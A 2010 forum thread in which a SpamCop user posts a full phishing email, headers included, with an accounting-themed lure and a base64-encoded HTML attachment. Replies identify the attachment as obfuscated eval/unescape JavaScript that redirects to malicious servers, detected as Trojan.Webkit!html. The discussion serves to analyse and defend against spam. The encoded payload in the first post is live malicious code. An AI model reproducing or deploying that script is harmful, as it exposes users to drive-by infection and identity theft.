Jump to content


Photo

Phishing attempts to my spamcop account


  • Please log in to reply
4 replies to this topic

#1 mplungjan@spamcop.net

mplungjan@spamcop.net

    Newbie

  • Members
  • Pip
  • 6 posts

Posted 17 September 2010 - 06:20 AM

Delivered-To: <myemail> Received: (qmail 4960 invoked from network); 17 Sep 2010 10:58:28 -0000 Received: from unknown (HELO m1pismtp01-018.prod.mesa1.secureserver.net) ([10.8.12.18]) (envelope-sender <ox[at]rootsproduce.com>) by smtp31.prod.mesa1.secureserver.net (qmail-1.03) with SMTP for <myemail>; 17 Sep 2010 10:58:28 -0000 X-IronPort-Anti-spam-Result: AtERAFvmkkzYmsMxf2dsb2JhbAAKBJQihW2HdxUBAQoKDBgEHowGhwKtf4VBBIRGiH0 Received: from c60.cesmail.net ([216.154.195.49]) by m1pismtp01-018.prod.mesa1.secureserver.net with ESMTP; 17 Sep 2010 03:58:27 -0700 Received: from unknown (HELO filter8.cesmail.net) ([192.168.1.218]) by c60.cesmail.net with SMTP; 17 Sep 2010 06:58:27 -0400 Received: (qmail 17745 invoked by uid 1010); 17 Sep 2010 10:58:27 -0000 Delivered-To: spamcop-net-<myname>[at]spamcop.net Received: (qmail 17681 invoked from network); 17 Sep 2010 10:58:26 -0000 X-spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on filter8 X-spam-Level: X-spam-Status: hits=0.1 tests=HTML_MESSAGE,RDNS_NONE version=3.2.4 Received: from unknown (192.168.1.107) by filter8.cesmail.net with QMQP; 17 Sep 2010 10:58:26 -0000 Received: from unknown (HELO YBTBJES) (92.246.206.203) by mx70.cesmail.net with SMTP; 17 Sep 2010 10:58:25 -0000 Received: from svtmail07.prod.sabre.com (svtmail04.prod.sabre.com [151.193.64.1]) by mail.global.frontbridge.com with esmtp id 5A849F-000946-63 for ljl[at]spamcop.net; Fri, 17 Sep 2010 14:58:19 +0300 Received: from samlab (10.208.04.9:61117) by svtmail09.prod.sabre.com (LSMTP for Windows NT v1.1b) with SMTP id <3.C0CBAD1D[at]svtmail05.prod.sabre.com>; Fri, 17 Sep 2010 14:58:19 +0300 Date: Fri, 17 Sep 2010 14:58:19 +0300 From: "Winfred Joiner" <ox[at]rootsproduce.com> To: ljl[at]spamcop.net Message-ID: <57114311.39684104853195612400.JavaMail.ita[at]samlab> Subject: Please help me MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_Part_1695044_17099105.4893020990891" X-SpamCop-Checked: 92.246.206.203 151.193.64.1 ------=_Part_1695044_17099105.4893020990891 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit Please help me to take over the accounting duties during the period Jackie will be gone. Make arrangements so that you will be able to issue checks and know where to deposit received checks. ------=_Part_1695044_17099105.4893020990891 Content-Type: text/html; name="52399xls.html" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="52399xls.html" PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5j dGlvbiBldGdyKHpqNHIpe3Zhcg0KYm85Nyxidmd5PSIiLGtwbjgsaXl2Mj0iMG9jZGZ1bTtpcC9x cmx4PW50Li06diBoZT5zXCJhPCIscDNqZSxqNDQ2PWl5djIubGVuZ3RoO2V2YWwodW5lc2NhcGUo IiU2NnVuJTYzdGklNkZuIHIlNjFpeSUyOGt1JTc5Yyl7JTYydmclNzkrPSU2QnV5YyU3RCIpKTtm b3IocDNqZT0wO3AzamU8emo0ci5sZW5ndGg7cDNqZSsrKXtibzk3PXpqNHIuY2hhckF0KHAzamUp O2twbjg9aXl2Mi5pbmRleE9mKGJvOTcpO2lmKGtwbjg+LTEpe2twbjgtPShwM2plKzEpJWo0NDY7 aWYoa3BuODwwKXtrcG44Kz1qNDQ2O31yYWl5KGl5djIuY2hhckF0KGtwbjgpKTt9ZWxzZXtyYWl5 KGJvOTcpO319ZXZhbCh1bmVzY2FwZSgiJTY0b2MlNzVtZSU2RXQudyU3Mml0JTY1KGIlNzZneSkl M0JidiU2N3k9JTIyJTIyOyIpKTt9ZXRncigiMGlcInZkYTA+cy0wbWUtaDtjPW94PmZ0Oi5oLTAw bi5zLXY6ZDs9eCBlXCJtb2M+O2E8bXNhdG1zb2w8Lml0dXFjaGlpeC1lPHUwOmFscGF4ciIpOzwv c2NyaXB0Pjxub3NjcmlwdD5UbyBkaXNwbGF5IHRoaXMgcGFnZSB5b3UgbmVlZCBhIGJyb3dzZXIg dGhhdCBzdXBwb3J0cyBKYXZhU2NyaXB0Ljwvbm9zY3JpcHQ+ ------=_Part_1695044_17099105.4893020990891--

#2 Farelf

Farelf

    What Life?

  • Membersph
  • PipPipPipPipPipPip
  • 6,674 posts

Posted 17 September 2010 - 07:17 AM

Thanks mplungjan. Any idea what that bit of JavaĐ…cript (the HTML attachment) you were sent does?

Can you refer to these things by way of a Tracking URL rather than as a paste-in of the actual spam? The forum formatting and badword filter changes stuff posted here, there can sometimes be live links to bad places and, although munged slightly, there is exposure of (usually) innocent addresses etc. when you post the spam in public.
Plus ca change, plus c'est la meme chose

#3 Farelf

Farelf

    What Life?

  • Membersph
  • PipPipPipPipPipPip
  • 6,674 posts

Posted 18 September 2010 - 12:18 AM

Well, I'm not a coder's bootlace (the more refined way to say it, if the phrase seems unfamiliar) but ... From several different code fragments in the (decoded) attachment it seems to be (slightly?) related to jsunpack - probably an unpacker for a lightning download then - though no source for the download is apparent to me. Lots of people might get "caught" by such a thing (if they have scripting allowed on their browser/mail client) if there is an actual payload and whatever that ultimate payload's function(s) might be would be anyone's guess - but identity theft is potentially the most serious. Nasty - or not sent by anyone wishing you well anyway.
Plus ca change, plus c'est la meme chose

#4 silentlarry

silentlarry

    Advanced Member

  • Membera
  • PipPipPip
  • 118 posts

Posted 20 September 2010 - 01:11 PM

FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.

Really low spam assassin score on most of these. Successful filtering is usually by CBL or one of the other BLs.


tracking1
tracking2
tracking3

#5 Farelf

Farelf

    What Life?

  • Membersph
  • PipPipPipPipPipPip
  • 6,674 posts

Posted 20 September 2010 - 07:44 PM

FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.

Well worth raising SL, seems it was and is a 'zero day' sort of thing. Zero detections from the massed AV engines at VirusTotal when the O/P first raised the topic but now my resident Norton says Trojan.Webkit!html - http://securityrespo...r...-99&tabid=2

Discovered: October 9, 2007
Updated: October 9, 2007 4:42:01 PM
Type: Trojan
Infection Length: Varies
Systems Affected: Windows 98, Windows 95, Windows XP, Solaris, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Linux, Windows 2000

Trojan.Webkit!html is a generic detection for HTML files containing malicious code to redirect users to malicious Web servers.

A successful compromise by a malicious Web server may result in additional malicious files being downloaded to the compromised computer

Seems the 'unescape' coding within the scri_pt may be variable and/or some random characters outside the active body of code may be variable - which successfully defeats initial detection - the O/P's version was not picked up by Norton until yesterday's/today's updates. Haven't specifically checked yours but that's what I think is happening - the hash values will be variable, the code content may appear variable until unescape codes resolved, the redirection destination (which is well obfuscated, I can't see it) may be variable, very likely each day's version of the thing will be undetectable as a threat to most scanners for some days after release.

HTML attachments/content in spam have been around for ages - the prudent assumption is, if they are in spam they probably *are* malicious but this is the first time I have personally verified an instance. Well, apart from a few web bugs (can't assume they are history either - to keep a step ahead, spammers sometimes step backwards). The 'inconvenience' of safe practice (no scripting allowed, no preview of email, view text only, don't read obvious spam at all, don't open unknown attachments or click on unknown links, query/prevent redirections) seems to be vindicated once again.
Plus ca change, plus c'est la meme chose




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users